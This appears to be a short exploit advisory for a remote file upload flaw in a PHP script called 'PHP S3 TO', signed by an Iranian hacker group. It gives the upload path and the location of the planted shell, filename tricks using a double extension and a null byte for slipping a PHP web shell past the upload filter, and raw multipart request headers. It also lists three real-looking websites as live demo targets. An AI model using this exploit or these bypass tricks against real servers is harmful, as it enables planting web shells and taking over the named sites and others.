######################################

Explit Title : "PHP S3 TO" Remote File Upload

Download : http://php.s3.to/script.php

Author : MR.XpR

Test on : LinuX R3dH4t

Bug discovered by : IRANHACK SecuRITY TEAM

#####################################

[+] Exploit :

[Protocol]Site.CoM/[dir]/up/upload.php

--------------------------------------------------------------

[+] Load files From :

[Protocol]Site.CoM/[dir]/up/img/Sh3ll.php.jpg

--------------------------------------------------------------

[+] Demo :

http://security2600.sakura.ne.jp/up/upload.php
http://omame.dnsalias.net/up/upload.php
http://diaros.net/up/upload.php

--------------------------------------------------------------

[+] Information :

This Bug Uploading a TxT , PhP , JpG , PNg 

change your shell to sh3ll.php.jpg or sh3ll.php%0%0.1.jpg

If Doesn't Work Use Tamper Data FireFox Plugin

--------------------------------------------------------------

[+] Upload Headers :

114782935826962\r\nContent-Disposition: form-data;
name="MAX_FILE_SIZE"\r\n\r\n1048576\r\n-1147829358
26962\r\nContent-Disposition: form-data;name="upfile";
filename="sh3ll.php.jpg"\r\nContent-Type: text/plain\r\n\r\n\r\n
-----------------------------114782935826962\r\nContent-Disposition:
form-data; name="pass"\r\n\r\n\r\n--114782935826962\r\nContent-Disposition:form-data;
name="com"\r\n\r\n\r\n-----------------------------114782935826962--\r\n


[+] Special TnX To :

Mr.XpR - Syamak Black - UnknowN - MR.EBI - Farbod Ezaril - Samim.s 
Saman Biliz - Sianor - Cair3x - M.R.S.C.0 - Bl4ck.Viper - Black King
Yaghi vahghi - H3llboy - inj3ct0r - Netqurd - Fixxer- R3ZA BLACK HAT
IRIST - Sokote.vahshat - TBH - IBH - IRH - ArYaIeIrAN - W0lf - Ajax TM 
joker_s - mr.4lir3z4 - nimaarek - All iranian Hackerz